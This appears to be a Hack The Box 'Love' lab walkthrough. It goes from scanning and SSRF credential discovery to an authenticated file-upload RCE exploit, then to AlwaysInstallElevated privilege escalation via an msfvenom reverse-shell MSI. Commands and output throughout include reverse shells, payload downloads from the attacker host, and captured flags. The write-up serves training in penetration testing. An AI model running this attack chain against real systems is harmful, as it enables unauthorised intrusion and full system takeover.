HTB Love done
Love
OS:
Windows
Technology:
IP Address:
10.129.159.190
Open ports:
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Users and pass:
L: admin
P: @LoveIsInTheAir!!!!
Nmap
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.159.190_nmap 10.129.159.190 ; cat IP_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 14:20 CET
Nmap scan report for 10.129.159.190
Host is up (0.035s latency).
Not shown: 65517 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: Voting System using PHP
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_http-title: 403 Forbidden
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| DNSVersionBindReqTCP, HTTPOptions, LDAPSearchReq, RPCCheck, RTSPRequest, TLSSessionReq, WMSRequest, oracle-tns:
|_ Host '10.10.14.65' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after: 2024-04-10T14:39:19
|_ssl-date: 2025-01-13T13:52:10+00:00; +21m32s from scanner time.
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Ffuz
──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ ffuf -u http://10.129.159.190/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -o 10.129.159.190_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.asp,.aspx
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.159.190/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .asp .aspx
:: Output file : 10.129.159.190_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
ADMIN [Status: 301, Size: 341, Words: 22, Lines: 10, Duration: 32ms]
Admin [Status: 301, Size: 341, Words: 22, Lines: 10, Duration: 35ms]
Home.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 45ms]
Images [Status: 301, Size: 342, Words: 22, Lines: 10, Duration: 36ms]
Index.php [Status: 200, Size: 4388, Words: 654, Lines: 126, Duration: 39ms]
Login.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 36ms]
admin [Status: 301, Size: 341, Words: 22, Lines: 10, Duration: 36ms]
dist [Status: 301, Size: 340, Words: 22, Lines: 10, Duration: 36ms]
home.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 38ms]
images [Status: 301, Size: 342, Words: 22, Lines: 10, Duration: 36ms]
includes [Status: 301, Size: 344, Words: 22, Lines: 10, Duration: 32ms]
index.php [Status: 200, Size: 4388, Words: 654, Lines: 126, Duration: 34ms]
licenses [Status: 403, Size: 423, Words: 37, Lines: 12, Duration: 34ms]
login.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 36ms]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 34ms]
plugins [Status: 301, Size: 343, Words: 22, Lines: 10, Duration: 38ms]
preview.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 39ms]
server-info [Status: 403, Size: 423, Words: 37, Lines: 12, Duration: 37ms]
server-status [Status: 403, Size: 423, Words: 37, Lines: 12, Duration: 34ms]
tcpdf [Status: 301, Size: 341, Words: 22, Lines: 10, Duration: 1207ms]
:: Progress: [184221/184221] :: Job [1/1] :: 1197 req/sec :: Duration: [0:03:23] :: Errors: 0 ::
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ cat /etc/hosts | grep love
10.129.159.190 staging.love.htb love.htb
Open website: http://staging.love.htb/beta.php
I found SSRF vuln
Check localhost on port 5000
http://localhost:5000
I found creds for user: admin
L: admin
P: @LoveIsInTheAir!!!!
Exploit: Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)
[Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)](https://www.exploit-db.com/exploits/49445)
Edit exploit
Modify settings and URL
---
# --- Edit your settings here ----
IP = "10.129.159.190" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.14.65" # Reverse shell IP
REV_PORT = "80" # Reverse port
# --------------------------------
INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"
Run exploit - revshell
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ python3 49445.py
Start a NC listner on the port you choose above and run...
Logged in
Poc sent successfully
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.65] from (UNKNOWN) [10.129.159.190] 61422
b374k shell : connected
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe
C:\xampp\htdocs\omrs\images>
Read flag: user.txt
C:\xampp\htdocs\omrs\images>cd C:\Users
cd C:\Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\Users
04/13/2021 05:58 AM <DIR> .
04/13/2021 05:58 AM <DIR> ..
04/12/2021 02:00 PM <DIR> Administrator
04/21/2021 06:01 AM <DIR> Phoebe
04/12/2021 01:10 PM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 3,948,240,896 bytes free
C:\Users>cd Phoebe
cd Phoebe
C:\Users\Phoebe>cd Desktop
cd Desktop
C:\Users\Phoebe\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\Users\Phoebe\Desktop
04/13/2021 02:20 AM <DIR> .
04/13/2021 02:20 AM <DIR> ..
01/13/2025 05:35 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 3,948,240,896 bytes free
C:\Users\Phoebe\Desktop>type user.txt
type user.txt
db324de3751981f74f50d2d7f5e592c2
C:\Users\Phoebe\Desktop>
WinPEAS
https://github.com/peass-ng/PEASS-ng/releases/tag/20250113-4426d62e
Upload to remote host
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.159.190 - - [13/Jan/2025 15:35:52] "GET /winPEASx64.exe HTTP/1.1" 200 -
---
C:\Users\Phoebe\Desktop>powershell wget http://10.10.14.65/winPEASx64.exe -outfile wp.exe
powershell wget http://10.10.14.65/winPEASx64.exe -outfile wp.exe
Download report: out.txt
C:\Users\Phoebe\Desktop>wp.exe log
wp.exe log
"log" argument present, redirecting output to file "out.txt"
C:\Users\Phoebe\Desktop>copy out.txt C:\xampp\htdocs\omrs\images\out.txt
copy out.txt C:\xampp\htdocs\omrs\images\out.txt
1 file(s) copied.
C:\Users\Phoebe\Desktop>
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ wget http://love.htb/images/out.txt
--2025-01-13 15:42:34-- http://love.htb/images/out.txt
Resolving love.htb (love.htb)... 10.129.159.190
Connecting to love.htb (love.htb)|10.129.159.190|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 164108 (160K) [text/plain]
Saving to: ‘out.txt’
out.txt 100%[==============================================>] 160.26K --.-KB/s in 0.1s
2025-01-13 15:42:35 (1.14 MB/s) - ‘out.txt’ saved [164108/164108]
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ file out.txt
out.txt: Unicode text, UTF-8 text, with very long lines (712), with CRLF, LF line terminators, with escape sequences, with overstriking
Read report - AlwaysInstallElevated
╔══════════╣ Checking AlwaysInstallElevated
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
Upload payload - revshell
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.65 LPORT=443 -f msi -o revshell.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: revshell.msi
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.159.190 - - [13/Jan/2025 15:58:52] "GET /revshell.msi HTTP/1.1" 200 -
---
C:\Users\Phoebe\Desktop>powershell wget http://10.10.14.65/revshell.msi -outfile revshell.msi
powershell wget http://10.10.14.65/revshell.msi -outfile revshell.msi
Run revshell
C:\Users\Phoebe\Desktop>msiexec /quiet /qn /i revshell.msi
msiexec /quiet /qn /i revshell.msi
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ netcat -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.65] from (UNKNOWN) [10.129.159.190] 61425
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
Read flag: root.txt
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Love]
└─$ netcat -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.65] from (UNKNOWN) [10.129.159.190] 61425
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30
Directory of C:\Users\Administrator\Desktop
04/13/2021 02:20 AM <DIR> .
04/13/2021 02:20 AM <DIR> ..
01/13/2025 05:35 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 3,936,100,352 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
d7784d4bf58c945847705c6d9a9557de
C:\Users\Administrator\Desktop>
References
[Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)](https://www.exploit-db.com/exploits/49445)
Lessons Learned